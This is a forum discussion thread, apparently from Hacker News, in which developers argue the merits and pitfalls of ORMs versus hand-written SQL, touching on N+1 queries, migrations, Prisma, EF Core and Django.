ORMs are absolutely fantastic at getting rid of the need for CRUD queries and the boilerplate code for translating a result set to a POCO and vice versa. They also allow you to essentially have a strongly typed database definition. They make db migrations and versioning trivial, though you must learn the idiosyncrasies.

What they are not for is crafting high performance query code.

It literally cannot result in insurmountable performance issues if you use it for CRUD. It's impossible because the resulting SQL is virtually identical to what you'd write natively.

If you try to create complex queries with ORMs then yes, you're in for a world of hurt and only have yourself to blame.

I don't really understand people who still write basic INSERT statements. To me, it's a complete waste of time and money. And why would you write such basic, fiddly, code yourself? It's a nightmare to maintain that sort of code too whenever you add more properties.


Plenty of tools out there doing plain SQL migrations with zero issues.

At my day job everyone gave up on attempting to use the awkward ORM DSL to do migrations and just writes the SQL. It's easier, faster, and about a dozen times clearer.

> I don't really understand people who still write basic INSERT statements

Because it’s literally 1 minute, and it’s refreshingly simple. It’s like a little treat! An after dinner mint!

I jest, I'm not out here hand-rolling all my stuff. I do often have semi-involved table designs that uphold quite a few constraints, so "plain inserts" aren't super common. Doing them in SQL is only marginally more complex than the plain inserts, but doing them with the ORM was nightmarish.


> It’s like a little treat! An after dinner mint!

You completely changed my perspective on simple SQL housekeeping. https://m.youtube.com/watch?v=qYPW3O6VhXo&t=48s


My definition of a senior engineer is someone who can think of most of the ways to do a thing... and has the wisdom to chose the best one, given the specific situation’s constraints.


Perhaps because databases were fundamental to the first programs I ever built (in the ancient 19xx's), but damn, I cannot believe how many so-called experienced devs - often with big titles and bigger salaries - cannot write SQL. It's honestly quite shocking to me. No offense, but wow.


Thing is, this used to be trivial to me, but I spent several years in a purely frontend role, so didn't interact directly with databases at all.

Moreover, the market promotes specialization. The other day I had a conversation with a friend who is rather a generalist, and we contrasted his career opportunities with those of a person I know who started out as a civil engineer but went into IT and, over the course of about four years, specialized so heavily in Angular - and only that - that he now makes more than the two of us combined.

He can't write an SQL statement - I'm not sure he was ever introduced to the concept. How does that feel?


This is a common sentiment because so many people use ORMs, and because people are using them so often they take the upsides for granted and emphasise the negatives.

I've worked with devs who hated on ORMs for performance issues and opted for custom queries that in time became just as much a maintenance and performance burden as the ORM code they replaced. My suspicion is the issues, like with most tools, are a case of devs not taking the time to understand the limits and inner workings of what they're using.


This fully matches my experience, and my conclusions as well. I'd add that I often don't get to pick whether the logic will be more on the ORM side, or on the DB side. I end up not caring either - just pick a side. Either the DB be dumb and the code be smart, or the other way around. I don't like it when both are trying to be smart - that's just extra work, and usually one of them fighting the other.


The reason I dislike ORMs is that you always have to learn a custom DSL and live in the documentation to remember stuff. I think AI has more context than my brain.

SQL does not really need fixing. And something like sqlc provides a good middle ground between ORMs and pure SQL.


There is a solution engineered specifically for avoiding N+1 queries and overfetching: GraphQL.

More specifically a GraphQL-native columnar database such as Dgraph, which can leverage the query to optimize fetching and joining.

Or, you could simply use a CRUD model 1:1 with your database schema and optimize top-level resolvers yourself where actually needed.

Prisma can also work, but is more susceptible to N+1 if the db adapter layer does separate queries instead of joining.


Prisma has shown me that anything is possible with an ORM. I think they may have changed this now, but at least within the last year, distincts were done IN MEMORY.

They had a reason, and I'm sure it had some merit, but we found this out while tracking down an OOM. On the bright side, my co-worker and I got a good joke to bring up on occasion out of it.


That sounds plausible in theory, but I've been developing big ol' LOB apps for more than 10 years now, and it happens very sporadically. I mean, bloated joins are maybe the most common issue, but never anywhere near bloated enough to be an actual problem.

And schema changes and migrations? With ORMs those are a breeze - what are you on about? It's like 80% of the reason we want to use ORMs. A data-type change or a typo is immediately caught during compilation, making refactoring super easy. It's like a free test of all the queries in the entire system. I assume we're talking about decent ORMs, where the schema is also managed in code, and a statically typed language; otherwise what's the point.

We're on .NET 8+ and using EF Core.


ORM hate might as well be a free square on "HN web development blog post Bingo".


Funny, I use Prisma and Pothos, with p99 below 50ms - no N+1.

(When it is not lower, it is because there are security-framework and other fields that might not be mapped directly to the Prisma schema.)


Doesn't Prisma do many SQL features, like distinct... in memory?


Yes, but you can use the `nativeDistinct` preview feature to rely on the DB to perform the operation.

You can see the related issue with more info:

https://github.com/prisma/prisma/issues/23846
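If I remember the schema syntax correctly, enabling it looks roughly like:

  generator client {
    provider        = "prisma-client-js"
    previewFeatures = ["nativeDistinct"]
  }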


Just in case:

Object-relational mapping (ORM) is a key concept in the field of Database Management Systems (DBMS), addressing the bridge between the object-oriented programming approach and relational databases. ORM is critical in data interaction simplification, code optimization, and smooth blending of applications and databases. The purpose of this article is to explain ORM, covering its basic principles, benefits, and importance in modern software development.


Why can't one use an ORM and then flag the queries which are slow? This is trivial.

Inspect the actual SQL query generated, and if needed modify ORM code or write a SQL query from scratch.


We have AI that scans for any potential N+1 query right now.

Do people forget how SQL works??? People literally try to forget how to program.

More and more programmers use markdown to "write" code.


At the end of the day it's a trade-off. It would be an exception if anyone could remember their own code/customization after 3 months. ORMs and frameworks are more or less conventions, which are easier to remember because you iterate on them multiple times. They are bloated for a good reason - to serve a much larger population than specific use cases - and yes, that does bring its own problems.


Weeks of handwriting SQL queries can save you hours of profiling and adding query hints.

If you want a maintainable system, enforce that everything goes through the ORM. Autogenerate migrations from the ORM classes, and have a check that the ORM representation and the deployed schema are in sync as part of your build. Block direct SQL access methods in your linter. Do that, and maintainability is a breeze.
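In Django, for example, that build check can be a single command (it exits non-zero when a model has changes with no corresponding migration):

  python manage.py makemigrations --check --dry-run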


The only time I've seen migrations randomly fail was when others were manually creating views that prevented modifications to tables. Using the migrations yourself for local dev environments is a good mitigation, except for that case.


Skill issue.

In the hands of a good team, ORMs and migrations are an unbeatable productivity boost.

Django is best in class.


Pro tip: don't use Django migrations. Manage the database first and mirror it in the ORM later.


Why? Isn't it easier to screw up the prod DB this way?


Business opportunity: Invent a type system that prevents N+1 queries.


But think of how much time you'll save on mapping entities to tables!!!! Better to reinvest that time making the ORM do a worse job, automatically, instead!!


Or just use MongoDB. No ORM needed.


Very practical, like a credit card.

Lets you do what you want here and now, and then pay dearly for it afterwards :-)


Eh, nobody wants to transfer rows to DTOs by hand.

My personal opinion is that ORMs are absolutely fine for reads, provided you periodically check query performance, which you need to do anyway. For writes it's a lot murkier.

It helps that EF+LINQ works so very well for me. You can even write something very close to SQL directly in C#, but I prefer the function syntax.


Yeah EF is amazing

